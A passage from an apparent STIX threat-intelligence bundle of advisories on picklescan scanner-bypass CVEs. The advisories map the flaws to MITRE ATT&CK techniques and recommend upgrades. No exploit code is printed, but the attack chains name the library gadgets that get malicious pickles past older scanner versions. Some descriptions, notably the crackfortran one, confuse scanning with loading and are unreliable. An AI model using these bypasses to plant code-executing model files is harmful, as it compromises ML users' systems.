to data theft, system disruption, or deployment of further malware. The nature of pickle files, often used in scientific computing and machine learning for sharing models and data, means that organizations relying on these exchanges could unknowingly ingest malicious code. The immediate consequence is a complete compromise of the processing environment, with potential follow-on effects of data loss, intellectual property theft, or widespread network intrusion.\n\n## Recommendation\n\n*   Immediately update `Picklescan` to version 0.0.33 or newer to patch CVE-2025-71372 and ensure proper detection of malicious numpy gadgets.\n*   Educate development and data science teams on the risks associated with deserializing untrusted `pickle` files, even those seemingly cleared by older versions of `Picklescan`.\n*   Implement strict provenance checks for all `pickle` files entering the environment; only load files from trusted and verified sources.\n*   Perform a retrospective scan of existing `pickle` files within your environment using the patched `Picklescan` version to identify any already compromised models or data artifacts.\n",
      "published": "2026-07-04T02:28:44Z",
      "labels": [
        "vulnerability",
        "deserialization",
        "python",
        "supply-chain",
        "numpy",
        "arbitrary-code-execution"
      ],
      "object_refs": [
        "indicator--448f40d6-a263-5782-b808-b0ecd5178ed9",
        "indicator--ca709584-f9b2-5121-908e-35d6e905791d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--a2bbc1a7-f032-500e-86d9-c38716e236cb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71372"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-rrxm-2pvv-m66x"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/picklescan-arbitrary-code-execution-via-numpy-f2py-crackfortran-getlincoef-gadget"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2de73508-6709-5658-93e1-3be76a0640e0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a7d81f32-afe4-5db4-bd95-8d0b84497ffa",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Client Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1203",
          "url": "https://attack.mitre.org/techniques/T1203"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--810570d0-7669-5d28-b54c-84274b9ff61a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a7d81f32-afe4-5db4-bd95-8d0b84497ffa",
      "target_ref": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--a7d81f32-afe4-5db4-bd95-8d0b84497ffa",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2025-71369: Picklescan Malicious Pickle Detection Bypass Leading to RCE",
      "description": "## Overview\n\nCVE-2025-71369 addresses a critical flaw in `picklescan` versions released before 0.0.28, a tool designed to detect malicious Python pickle files. This vulnerability permits remote attackers to craft specially designed pickle files that leverage `torch.utils.data.datapipes.utils.decoder.basichandlers` within their `__reduce__` methods. The `picklescan` library, when tasked with scanning such files, fails to identify the embedded malicious code, effectively bypassing its intended security checks. Consequently, when an affected application or system subsequently deserializes these \"undetected\" malicious pickle files, the embedded code is executed, leading to remote code execution (RCE). This poses a significant supply chain risk, as data scientists or ML engineers using vulnerable `picklescan` versions could inadvertently process compromised data, granting attackers control over their environments.\n\n## Attack Chain\n\n1.  An attacker crafts a malicious Python pickle file by embedding arbitrary code within the `__reduce__` method, specifically utilizing `torch.utils.data.datapipes.utils.decoder.basichandlers` to evade detection.\n2.  The attacker distributes this malicious pickle file, potentially through compromised data repositories, malicious PyPI packages, or by sending it directly to a target.\n3.  A victim organization or individual downloads and stores the seemingly benign pickle file, potentially as part of a dataset or machine learning model.\n4.  The victim's environment, which integrates a vulnerable version of `picklescan` (prior to 0.0.28), processes or scans the downloaded pickle file.\n5.  Due to CVE-2025-71369, `picklescan` fails to identify the malicious payload within the pickle file, allowing it to be treated as legitimate.\n6.  A Python application or framework within the victim's environment attempts to deserialize the \"clean\" pickle file.\n7.  During the deserialization process, the malicious code embedded via the `__reduce__` method is executed by the Python interpreter.\n8.  This execution leads to remote code execution (RCE), granting the attacker unauthorized control over the system where deserialization occurred, potentially allowing for data exfiltration, further compromise, or system disruption.\n\n## Impact\n\nThe successful exploitation of CVE-2025-71369 can lead to severe consequences, as remote code execution (RCE) grants attackers full control over the compromised system. This can result in unauthorized access to sensitive data, installation of backdoors, deployment of ransomware, or the use of the compromised system as a pivot point for further network penetration. Given the nature of pickle files in data science and machine learning workflows, this vulnerability presents a significant supply chain risk, potentially affecting numerous organizations that exchange or process such data. The CVSS v3.1 Base Score of 8.1 (High) underscores the critical nature of this flaw, highlighting the ease of exploitation and high impact on confidentiality and integrity.\n\n## Recommendation\n\n*   Immediately upgrade `picklescan` to version 0.0.28 or later to remediate CVE-2025-71369, which contains the fix for this vulnerability.\n*   Implement strict input validation and sanitization for all pickle files processed by your applications, especially those originating from untrusted or external sources.\n*   Review existing practices for handling and deserializing pickle files; avoid deserializing untrusted data whenever possible.\n*   Ensure that any systems processing pickle files operate with the principle of least privilege to minimize the potential impact of successful exploitation.\n",
      "published": "2026-07-04T02:27:56Z",
      "labels": [
        "python",
        "deserialization",
        "rce",
        "vulnerability",
        "supply-chain",
        "machine-learning"
      ],
      "object_refs": [
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
        "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71369"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-h3qp-7fh3-f8h4"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/picklescan-unsafe-deserialization-via-torch-utils-data-datapipes-utils-decoder-basichandlers"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Client Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1203",
          "url": "https://attack.mitre.org/techniques/T1203"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3ac0a616-be88-5d7a-b831-8966b9a5d622",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b2043a99-7a8c-508a-b169-7fb2cde7d8af",
      "target_ref": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--98e81f8c-25ea-59e2-830f-a99e37078ea2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b2043a99-7a8c-508a-b169-7fb2cde7d8af",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--b2043a99-7a8c-508a-b169-7fb2cde7d8af",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2025-71367: Picklescan Bypass Leading to Arbitrary Code Execution",
      "description": "## Overview\n\nA critical vulnerability, CVE-2025-71367, has been identified in `picklescan` versions prior to 0.0.34. This security flaw stems from `picklescan`'s inability to properly detect the use of `_operator.attrgetter` function calls when they are embedded within `pickle` payloads' `reduce` methods. This oversight allows remote attackers to effectively bypass `picklescan`'s intended security checks, designed to prevent malicious deserialization. By crafting a specially designed `pickle` file that leverages this bypass, an attacker can achieve arbitrary code execution on systems that deserialize these files using `pickle.load()` while relying on the vulnerable `picklescan` version for security. This vulnerability exposes affected applications to severe compromise, including full system control and data exfiltration.\n\n## Attack Chain\n\n1.  Attacker crafts a malicious Python `pickle` file containing carefully constructed bytecode.\n2.  The malicious `pickle` payload specifically utilizes the `_operator.attrgetter` function within `reduce` methods to invoke arbitrary code.\n3.  This specific structure is designed to evade the security detection mechanisms implemented in `picklescan` versions before 0.0.34.\n4.  The attacker delivers this crafted `pickle` file to a victim system, potentially via email attachments, compromised package repositories, or malicious downloads.\n5.  A vulnerable application on the victim system attempts to deserialize the malicious `pickle` file using Python's `pickle.load()` function.\n6.  During the deserialization process, the integrated `picklescan` library (version \u003c 0.0.34) fails to identify the embedded, malicious `_operator.attrgetter` calls as a threat.\n7.  Due to `picklescan`'s detection bypass, the deserialization process proceeds unchecked, leading to the execution of the arbitrary code defined within the malicious `pickle` payload.\n8.  The attacker successfully achieves arbitrary code execution on the victim system, potentially leading to system compromise, data theft, or further lateral movement.\n\n## Impact\n\nSuccessful exploitation of CVE-2025-71367 can lead to severe consequences for organizations utilizing `picklescan` versions before 0.0.34. Since the vulnerability allows for arbitrary code execution, attackers can gain full control over the compromised system, leading to unauthorized data access, modification, or destruction. This could result in significant data breaches, operational disruption, and reputational damage. While specific victim counts are not available, any system processing untrusted `pickle` files with vulnerable `picklescan` versions is at risk, particularly those in data science, machine learning, or software development pipelines where `pickle` is frequently used for object serialization.\n\n## Recommendation\n\n*   Immediately update `picklescan` to version 0.0.34 or higher to remediate CVE-2025-71367.\n*   Ensure all applications and services that handle `pickle` files are using the patched `picklescan` library.\n*   Implement secure deserialization practices, avoiding `pickle.load()` of untrusted data even with security scanning, as illustrated by CVE-2025-71367.\n",
      "published": "2026-07-04T02:27:18Z",
      "labels": [
        "deserialization",
        "vulnerability",
        "python",
        "pickle",
        "rce"
      ],
      "object_refs": [
        "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669",
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71367"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-46h3-79wf-xr6c"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Client Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1203",
          "url": "https://attack.mitre.org/techniques/T1203"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--80e4b4b1-783e-5f92-8d20-f80008bd2047",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--cb432e36-4d99-53ba-b44c-845101b47fc5",
      "target_ref": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2f6dd4e0-be68-5e5b-9c72-b5f3cf2b0475",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--cb432e36-4d99-53ba-b44c-845101b47fc5",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--cb432e36-4d99-53ba-b44c-845101b47fc5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2025-71366: Picklescan Deserialization Vulnerability Leads to RCE",
      "description": "## Overview\n\nA significant deserialization vulnerability, tracked as CVE-2025-71366, has been identified in `picklescan` versions predating 0.0.28. This flaw allows malicious actors to craft Python pickle files that include specific `torch.utils.bottleneck.__main__.run_cprofile` function calls. Critically, the `picklescan` library, designed to detect and prevent malicious code execution from untrusted pickle files, fails to properly identify these embedded calls. This bypass of security checks enables remote attackers to inject and execute arbitrary code. When a victim's system loads such a specially crafted and undetected malicious pickle file, the embedded code executes with the privileges of the application processing the file, leading to potential system compromise and data loss. This vulnerability is highly impactful due to the widespread use of pickle files in Python ecosystems for data serialization and the security trust placed in `picklescan`.\n\n## Attack Chain\n\n1.  An attacker crafts a malicious Python pickle file containing a serialized object that leverages `torch.utils.bottleneck.__main__.run_cprofile` to embed arbitrary code.\n2.  The attacker ensures the payload is specifically designed to bypass the detection mechanisms implemented in `picklescan` versions older than 0.0.28.\n3.  The attacker delivers the crafted malicious pickle file to a target system, potentially through untrusted data ingestion, shared repositories, or direct download.\n4.  A user or an automated process on the victim's system initiates the loading of the malicious pickle file using a Python application that integrates with the vulnerable `picklescan` library.\n5.  During the scanning process, the vulnerable `picklescan` library (version \u003c 0.0.28) fails to detect the malicious `torch.utils.bottleneck.__main__.run_cprofile` call due to the inherent deserialization vulnerability.\n6.  Upon deserialization of the undetected malicious pickle file, the embedded arbitrary code is executed on the victim's system, achieving remote code execution.\n\n## Impact\n\nSuccessful exploitation of CVE-2025-71366 results in arbitrary code execution on the victim's system, allowing attackers to take full control of the compromised machine. This can lead to unauthorized data access, modification, or exfiltration; installation of malware such as ransomware or backdoors; and further lateral movement within the network. While specific victim counts or targeted sectors are not provided in the source, any organization or individual processing untrusted pickle files with vulnerable versions of `picklescan` could be at risk, especially those in data science, machine learning, or research environments.\n\n## Recommendation\n\n*   **Patch CVE-2025-71366 immediately** by upgrading `picklescan` to version 0.0.28 or later to address the deserialization vulnerability.\n*   Implement strict validation and sandboxing for all incoming pickle files, especially those from untrusted sources, even after patching, as a defense-in-depth measure against similar deserialization flaws.\n",
      "published": "2026-07-04T02:26:41Z",
      "labels": [
        "cve",
        "vulnerability",
        "deserialization",
        "python",
        "picklescan"
      ],
      "object_refs": [
        "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71366"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-4r9r-ch6f-vxmx"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Client Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1203",
          "url": "https://attack.mitre.org/techniques/T1203"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--50f25c96-7ea2-5980-8193-d9705658da79",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--77929867-a72f-5ee5-b0dd-f2902c91dbf7",
      "target_ref": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1059",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b6109a9e-4dcc-55fd-88ff-c7f5b9fa4778",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--77929867-a72f-5ee5-b0dd-f2902c91dbf7",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--77929867-a72f-5ee5-b0dd-f2902c91dbf7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2025-71364: picklescan Remote Code Execution via Undetected asyncio._UnixSubprocessTransport._start",
      "description": "## Overview\n\nCVE-2025-71364 addresses a critical remote code execution (RCE) vulnerability in `picklescan` versions before 0.0.30. `picklescan` is a security tool designed to detect malicious constructs within Python pickle files. However, a flaw exists where it fails to properly identify the `asyncio.unix_events._UnixSubprocessTransport._start` function when embedded within pickle reduce methods. Threat actors can leverage this oversight to craft sophisticated malicious pickle files. These specially constructed files bypass `picklescan`'s detection mechanisms, enabling arbitrary command execution when a vulnerable application attempts to deserialize them on Unix-like operating systems. This vulnerability poses a significant risk to systems that process untrusted pickle files and rely on `picklescan` for protection, as it allows attackers to bypass security controls and gain full control over affected systems.\n\n## Attack Chain\n\n1.  An attacker crafts a Python pickle file containing a malicious payload designed for remote code execution.\n2.  This payload specifically embeds the `asyncio.unix_events._UnixSubprocessTransport._start` function within the pickle's reduce methods to evade detection.\n3.  The attacker distributes the malicious pickle file to a victim, potentially via untrusted sources like compromised repositories, email attachments, or malicious file uploads.\n4.  The victim's system, which uses `picklescan` for security scanning, processes the file as part of its operations.\n5.  Due to a flaw in `picklescan` versions before 0.0.30, the embedded malicious function goes undetected during the scan.\n6.  When a vulnerable application on a Unix-like system attempts to deserialize (load) the malicious pickle file, the `_UnixSubprocessTransport._start` function is invoked.\n7.  This invocation leads to the execution of arbitrary commands embedded in the pickle, achieving Remote Code Execution (RCE) on the victim's system.\n\n## Impact\n\nThe successful exploitation of CVE-2025-71364 results in arbitrary code execution on the compromised system. This grants attackers full control, allowing them to install malware, exfiltrate sensitive data, modify system configurations, or establish persistence. The vulnerability, rated with a CVSS v3.1 base score of 8.1 (High), primarily affects organizations and individuals who process or deserialize untrusted Python pickle files on Unix-like systems, especially those relying on `picklescan` for pre-processing security checks.\n\n## Recommendation\n\n*   Immediately upgrade `picklescan` to version 0.0.30 or later to patch CVE-2025-71364.\n*   Implement strict validation and sanitization for any external or untrusted Python pickle files processed by applications.\n*   As a general security practice, avoid deserializing pickle files from untrusted sources, even with security scanners in place.\n",
      "published": "2026-07-04T02:25:57Z",
      "labels": [
        "vulnerability",
        "rce",
        "deserialization",
        "python",
        "picklescan"
      ],
      "object_refs": [
        "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71364"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-q77w-mwjj-7mqx"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/picklescan-arbitrary-code-execution-via-undetected-asyncio-unix-events-unixsubprocesstransport-start"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5d4cb5cb-a5d8-56ba-8d44-211654a2328b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--fef54d1b-3e19-5447-98c7-d55006b02ffe",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6d2fad35-8b6a-57d0-a0e5-2dada958b82f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--fef54d1b-3e19-5447-98c7-d55006b02ffe",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--fef54d1b-3e19-5447-98c7-d55006b02ffe",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2025-71362 — picklescan before 0.0.33 fails to detect unsafe deserialization when numpy.f2py.crackfortran functio...",
      "description": "## Overview\n\nA critical vulnerability, CVE-2025-71362, has been identified in `picklescan` versions prior to 0.0.33. This issue stems from `picklescan`'s failure to adequately detect unsafe deserialization patterns within `numpy.f2py.crackfortran` functions. Specifically, when these functions process data, they may call `eval` on arbitrary strings derived from pickle files, creating an arbitrary code execution vector. Attackers can craft malicious pickle files containing embedded code. If these untrusted files are subsequently loaded and processed by a vulnerable `picklescan` instance, the embedded malicious code will execute, granting the attacker control over the compromised system. This vulnerability poses a significant risk to applications and environments that handle or process pickle files from external or untrusted sources.\n\n## Attack Chain\n\n1.  **Vulnerability Identification**: An attacker identifies a target system or application that uses `picklescan` (version \u003c 0.0.33) to process Python pickle files.\n2.  **Malicious Pickle File Creation**: The attacker crafts a specially designed pickle file that contains malicious Python code. This code is structured to exploit the unsafe deserialization flaw in `numpy.f2py.crackfortran` functions, ensuring that when the file is loaded, the `eval` function is called with the attacker's payload.\n3.  **Delivery**: The attacker delivers the malicious pickle file to the victim. This could be via email (as an attachment), through a compromised web application, or by placing it in a location where the victim's application is expected to load files (e.g., a shared drive, an untrusted repository).\n4.  **User/Application Interaction**: The victim's application or user, believing the pickle file to be legitimate or benign, initiates the loading process of the untrusted pickle file using the vulnerable `picklescan` library.\n5.  **Vulnerable Deserialization**: During the deserialization process, the `picklescan` library invokes `numpy.f2py.crackfortran` functions. Due to the CVE-2025-71362 vulnerability, these functions call `eval` on the arbitrary malicious strings embedded within the pickle file.\n6.  **Arbitrary Code Execution**: The `eval` call executes the attacker's embedded malicious code within the context of the vulnerable application, leading to arbitrary code execution on the host system.\n7.  **Impact on System**: With arbitrary code execution, the attacker can achieve various objectives, such as data exfiltration, installation of malware, establishment of persistence, or full system compromise.\n\n## Impact\n\nThe successful exploitation of CVE-2025-71362 allows for arbitrary code execution on the system running the vulnerable `picklescan` instance. This means an attacker could gain full control over the affected system, potentially leading to complete data compromise, installation of ransomware, deployment of backdoors, or lateral movement within the network. While specific victim counts or targeted sectors are not detailed in the NVD advisory, any organization or developer using affected versions of `picklescan` to process untrusted Python pickle files is at risk. The consequences range from data breach and operational disruption to severe reputational damage.\n\n## Recommendation\n\n*   **Patch CVE-2025-71362**: Immediately upgrade `picklescan` to version 0.0.33 or later to mitigate CVE-2025-71362.\n*   **Implement Input Validation**: Ensure that all pickle files processed by applications are from trusted sources and implement strict validation before deserialization.\n*   **Isolate Processing**: If processing untrusted pickle files is unavoidable, perform the deserialization in a highly isolated environment (e.g., a secure sandbox or virtual machine) to contain potential arbitrary code execution.\n",
      "published": "2026-07-04T02:25:03Z",
      "labels": [
        "cve",
        "deserialization",
        "python",
        "arbitrary-code-execution",
        "vulnerability",
        "picklescan"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71362"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-r8g5-cgf2-4m4m"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/picklescan-arbitrary-code-execution-via-unsafe-deserialization-in-numpy-f2py-crackfortran"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Client Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1203",
          "url": "https://attack.mitre.org/techniques/T1203"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--21f56b7d-d902-5a00-a5a0-6498dc6c213a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--de7ff183-b9e1-5b3c-8a43-9974f2cd0272",
      "target_ref": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8c143a58-e75a-50d9-ba5f-dcce34e10ae0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--de7ff183-b9e1-5b3c-8a43-9974f2cd0272",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--de7ff183-b9e1-5b3c-8a43-9974f2cd0272",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2025-71360: Picklescan RCE via Undetected Malicious Pickle Files",
      "description": "## Overview\n\nCVE-2025-71360 describes a critical deserialization vulnerability impacting `picklescan` versions prior to 0.0.29, a Python library designed to detect malicious code within Python pickle files. Specifically, the flaw lies in `picklescan`'s failure to detect malicious code embedded using the `idlelib.calltip.get_entity` function within pickle reduce methods. This oversight allows attackers to craft specially designed pickle files containing arbitrary Python code that bypasses `picklescan`'s security checks. When a victim subsequently loads such a malicious pickle file, the embedded code is executed, enabling remote command execution (RCE) on the affected system. This vulnerability poses a significant risk to applications that process or scan untrusted pickle files, as it effectively nullifies the security benefits `picklescan` is intended to provide.\n\n## Attack Chain\n\n1.  An attacker crafts a malicious Python pickle file containing arbitrary code, leveraging the `idlelib.calltip.get_entity` function within the pickle's `__reduce__` method to embed their payload.\n2.  The attacker distributes this specially crafted pickle file to a target system, potentially through email attachments, untrusted file downloads, or as part of a compromised data exchange.\n3.  A victim receives and attempts to process or scan the untrusted pickle file using an affected version of the `picklescan` library (prior to 0.0.29).\n4.  The `picklescan` library, when performing its security checks, fails to correctly identify and flag the malicious code embedded via `idlelib.calltip.get_entity`.\n5.  The malicious pickle file is then loaded or deserialized by a Python application or script on the victim's system.\n6.  During the deserialization process, the embedded code within the pickle file executes, leading to arbitrary remote command execution on the victim's system, granting the attacker control.\n\n## Impact\n\nSuccessful exploitation of CVE-2025-71360 leads to arbitrary remote code execution on the victim's system. This can result in complete system compromise, allowing attackers to install malware, exfiltrate sensitive data, establish persistence, or pivot to other systems within the network. Organizations relying on `picklescan` for validating untrusted data could be unknowingly processing malicious content, leading to widespread compromise. The direct impact is the subversion of a security control, enabling attackers to bypass detection and execute their payloads.\n\n## Recommendation\n\n*   Immediately update `picklescan` to version 0.0.29 or newer to remediate CVE-2025-71360.\n*   Implement strict controls around the handling and loading of Python pickle files, treating all external or untrusted pickle files as potentially malicious.\n*   Educate users and developers on the dangers of deserializing untrusted data and the importance of using secure deserialization alternatives or strict validation.\n*   Consider deploying application-level sandboxing or isolation for processes that handle pickle file deserialization to limit the impact of potential RCE.\n",
